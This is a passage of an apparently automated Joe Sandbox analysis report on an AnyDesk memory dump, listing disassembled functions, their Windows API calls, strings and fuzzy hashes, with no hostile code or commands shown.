                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                  • Opcode ID: 7110a9e48fe4fd9861265fb5d50f395661b49636f0feaab5c646ac3830da9ad4
                                                                                                                                                                                                                                                  • Instruction ID: 67d8e00f68856bc154961c6f625679d32cc3dbc48dd8dc46f9028dd9d64ff89d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7110a9e48fe4fd9861265fb5d50f395661b49636f0feaab5c646ac3830da9ad4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C911B6BA650508BFDF01DF54E880CD93BA5EF44654B01E0A5BE488F271EB32DB589B81
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                   • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                   • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                   • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                   • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                   • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 58652288ce96af1a62123ad052cae5c46b056abac0944fee417654110ea4e2fe
                                                                                                                                                                                                                                                  • Instruction ID: 4193e80e27d434498b7b0a8bd95e6ec8bfe1f03605b831823e96865fc5367804
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 58652288ce96af1a62123ad052cae5c46b056abac0944fee417654110ea4e2fe
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BAC10B74E842499FDF01CFACE840BAD7BB5FF4A324F048158D452AB391E7349961CB65
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C5BB7C: CreateFileW.KERNEL32(00000000,00000000,?,69C5BEE6,?,?,00000000,?,69C5BEE6,00000000,0000000C), ref: 69C5BB99
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 69C5BF51
                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 69C5BF58
                                                                                                                                                                                                                                                  • GetFileType.KERNEL32(00000000), ref: 69C5BF64
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 69C5BF6E
                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 69C5BF77
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 69C5BF97
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 69C5C0E1
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 69C5C113
                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 69C5C11A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                   • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                   • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                   • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                   • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                   • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4237864984-0
                                                                                                                                                                                                                                                  • Opcode ID: 042a36def87d59f97d5e17a9f63c18a03db0e8bfea843ab166aaf4b444cc0dee
                                                                                                                                                                                                                                                  • Instruction ID: 02e363a79685bd8be0d015a97dc362615d0298cba5fb34ad88d3b45252221aaf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 042a36def87d59f97d5e17a9f63c18a03db0e8bfea843ab166aaf4b444cc0dee
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94A14436A141588FDF08CF68E851BAE3FB5EB4A324F144159E812EF3D1E7349922CB56
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1282221369-0
                                                                                                                                                                                                                                                  • Opcode ID: d704c7d4f3251b5708e62c412f0976ec02310c6d22c9b93147ba133822eec98d
                                                                                                                                                                                                                                                  • Instruction ID: 88e104d9cbe5e61f78fbcec164aecf444a0a773e4e40b92ce37712b932d83304
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d704c7d4f3251b5708e62c412f0976ec02310c6d22c9b93147ba133822eec98d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2616972A043106FEF11DF69A840AAD7BB4AF02764F00C16DDC56AB281F73286B1D795
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?), ref: 69C401D4
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?), ref: 69C40268
                                                                                                                                                                                                                                                  • ___crtCompareStringEx.LIBCPMT ref: 69C40282
                                                                                                                                                                                                                                                  • ___crtCompareStringEx.LIBCPMT ref: 69C402BE
                                                                                                                                                                                                                                                  • ___crtCompareStringEx.LIBCPMT ref: 69C40337
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 69C40352
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 69C4035F
                                                                                                                                                                                                                                                    • Part of subcall function 69C4C844: HeapAlloc.KERNEL32(00000000,0000010C,00000004,?,69C4C8A7,?,00000000,?,69C57B70,0000010C,00000004,?,0000010C,?,?,69C4DB9D), ref: 69C4C876
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 69C40372
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 69C4037D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharCompareMultiStringWide___crt__freea$AllocHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2499053095-0
                                                                                                                                                                                                                                                  • Opcode ID: 7196d144264a6780f3b1b18813a7ba7c393ff23315be2c6d6f46e8b90e478e9d
                                                                                                                                                                                                                                                  • Instruction ID: 59891d077e45d569f2fccbfb0538cd9a58b3f03d6908df84b824fa925f98205a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7196d144264a6780f3b1b18813a7ba7c393ff23315be2c6d6f46e8b90e478e9d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7351D472B90216ABDF11CFA5EC80D9E7FA9FB69B54B008529E914E6150FB34C950CB90
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000400,00000001,?,00000000,00000000), ref: 69C5F396
                                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,00000008,?,00000000), ref: 69C5F3B3
                                                                                                                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 69C5F3CF
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 69C5F3D5
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 69C5F3E0
                                                                                                                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 69C5F406
                                                                                                                                                                                                                                                  • ConvertSidToStringSidW.ADVAPI32(?,?), ref: 69C5F420
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 69C5F43C
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 69C5F443
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Token$CloseErrorHandleInformationLastOpenProcess$ConvertString
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1608810797-0
                                                                                                                                                                                                                                                  • Opcode ID: 40fb57898508f49c6dae011441e10196fcf973624d0b05ee31a9b89965c99345
                                                                                                                                                                                                                                                  • Instruction ID: 7378b08205b37df7a82f71e9f9a2f34651e7e6c413490bfd973d983c8bede6cd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 40fb57898508f49c6dae011441e10196fcf973624d0b05ee31a9b89965c99345
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B218E35A40218FFEF019FA6DC89ABE7BBDEF05314F404451F912E2050E7719E62AB61
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 69C3E754
                                                                                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,?), ref: 69C3E798
                                                                                                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 69C3E7DB
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Directory$FileModuleNameSystemWindows
                                                                                                                                                                                                                                                  • String ID: Internet Explorer$Microsoft$ProgramW6432$Quick Launch
                                                                                                                                                                                                                                                  • API String ID: 592745672-224070340
                                                                                                                                                                                                                                                  • Opcode ID: c060a6734335728c84555876baa61a41167b6dadc8a4446ac1fdecc6d9ba436a
                                                                                                                                                                                                                                                  • Instruction ID: 9568d229e6a76ef374b51b542943e724728479dbd88036626e006488d66878fa
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c060a6734335728c84555876baa61a41167b6dadc8a4446ac1fdecc6d9ba436a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4C1B034268310ABE614DB64EC55FAEB7E8BF81744F90492DF2519B0D0FB71A909CB63
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 69C21E54
                                                                                                                                                                                                                                                    • Part of subcall function 69C3FC31: std::invalid_argument::invalid_argument.LIBCONCRT ref: 69C3FC3D
                                                                                                                                                                                                                                                    • Part of subcall function 69C3FC31: __CxxThrowException@8.LIBVCRUNTIME ref: 69C3FC4B
                                                                                                                                                                                                                                                  • new.LIBCMT ref: 69C21F48
                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,00000004,00000003,00000000,00000004,00000080,00000000), ref: 69C21F81
                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,00000004,00000003,00000000,00000004,00000080,00000000,?,debug.log), ref: 69C22032
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$Create$Exception@8ModuleNameThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                  • String ID: \$debug.log$invalid string position
                                                                                                                                                                                                                                                  • API String ID: 3749634790-2581654245
                                                                                                                                                                                                                                                  • Opcode ID: 357081b807ed9c750bd27df56aef875ac7788d23b681d0279dbacf4876f68b44
                                                                                                                                                                                                                                                  • Instruction ID: 573e03dd2243737405e0dbe926cfcd0b20736da0babcdde007835d3a4f83de5c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 357081b807ed9c750bd27df56aef875ac7788d23b681d0279dbacf4876f68b44
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34510574A003189FDB24DF74EC55BAE77B4BF01718F504619E922AB2D0FB71AA06CB51
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 69C5EF1F
                                                                                                                                                                                                                                                  • RegCreateKeyExW.ADVAPI32(80000002,SOFTWARE\Google\No Chrome Offer Until,00000000,00000000,00000000,0002001F,00000000,?,?,00000000), ref: 69C5EF81
                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000), ref: 69C5EFD4
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 69C5F03D
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • SOFTWARE\Google\No Chrome Offer Until, xrefs: 69C5EF6F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseCreateFileModuleNameQueryValue
                                                                                                                                                                                                                                                  • String ID: SOFTWARE\Google\No Chrome Offer Until
                                                                                                                                                                                                                                                  • API String ID: 2815806617-1538224596
                                                                                                                                                                                                                                                  • Opcode ID: f49bd3686145c2fb2060ff2561dceec454e2c8878d5f4d8753fe62c8b4d3b27e
                                                                                                                                                                                                                                                  • Instruction ID: cf39ffc42617b61cd5baf187253e339af1e9b358d25ba3ef52fda5f475b64405
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f49bd3686145c2fb2060ff2561dceec454e2c8878d5f4d8753fe62c8b4d3b27e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 423132B5A40228AFDB20CF11DC49FEAB7BCEB45310F8041AAF60A96141E7715A95CF69
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNEL32(69C66322,69C66322,0000001C,?,00000000,00000001), ref: 69C66B7A
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 69C66B93
                                                                                                                                                                                                                                                  • SetEndOfFile.KERNEL32(69C66322), ref: 69C66BE1
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 69C66BFA
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\file\file_io_win.cc, xrefs: 69C66BA0, 69C66C07
                                                                                                                                                                                                                                                  • SetEndOfFile, xrefs: 69C66C1A
                                                                                                                                                                                                                                                  • SetFilePointerEx, xrefs: 69C66BB3
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorFileLast$Pointer
                                                                                                                                                                                                                                                  • String ID: SetEndOfFile$SetFilePointerEx$c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\file\file_io_win.cc
                                                                                                                                                                                                                                                  • API String ID: 1697706070-3222943609
                                                                                                                                                                                                                                                  • Opcode ID: fbdadac08709b80108ec57b0bed737736f7402103d5f8840fa2870fc72b25824
                                                                                                                                                                                                                                                  • Instruction ID: 075edeff228beb803e95bf72a4fd6e82f43836f6ae7388983b9a7f3b8f2e20f9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fbdadac08709b80108ec57b0bed737736f7402103d5f8840fa2870fc72b25824
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A215735904B08BAEB14CFA0FDD2FAD7768BF01358F809455E6043A0D1FB3255865914
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetCPInfo.KERNEL32(?,?), ref: 69C5DE77
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 69C5DEFA
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 69C5DF8D
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 69C5DFA4
                                                                                                                                                                                                                                                    • Part of subcall function 69C4C844: HeapAlloc.KERNEL32(00000000,0000010C,00000004,?,69C4C8A7,?,00000000,?,69C57B70,0000010C,00000004,?,0000010C,?,?,69C4DB9D), ref: 69C4C876
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 69C5E020
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 69C5E04B
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 69C5E057
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$__freea$AllocHeapInfo
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2171645-0
                                                                                                                                                                                                                                                  • Opcode ID: 50c4e2176e6e247271a7bc8e13c80de61e99358da63e3ee2f6903d6932b01917
                                                                                                                                                                                                                                                  • Instruction ID: 563c7b4d5bd22db1ffdda85bb509174dc049a296ce414183c30a2e5c524bceb6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50c4e2176e6e247271a7bc8e13c80de61e99358da63e3ee2f6903d6932b01917
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B91D271E00316ABDF10CE64E840EEE7BB5AB59794F05862AE812E7181F775D870CB68
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                                  • Opcode ID: f61108f0a8b825492974f0b247afc1dfe8301811278908e8b899d6613912d57a
                                                                                                                                                                                                                                                  • Instruction ID: 1a1887a081cd9580d4a068b2f1a62aebc8c8671ad9425f8572c6e2325df51f75
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f61108f0a8b825492974f0b247afc1dfe8301811278908e8b899d6613912d57a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E61D3B5E04605AFDB20CF68E841B9ABBF5FF45710F5081AAEC45EB280F77099618B54
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,69C497B5,?,?,?,?,?,?), ref: 69C49082
                                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 69C490FD
                                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 69C49118
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 69C4913E
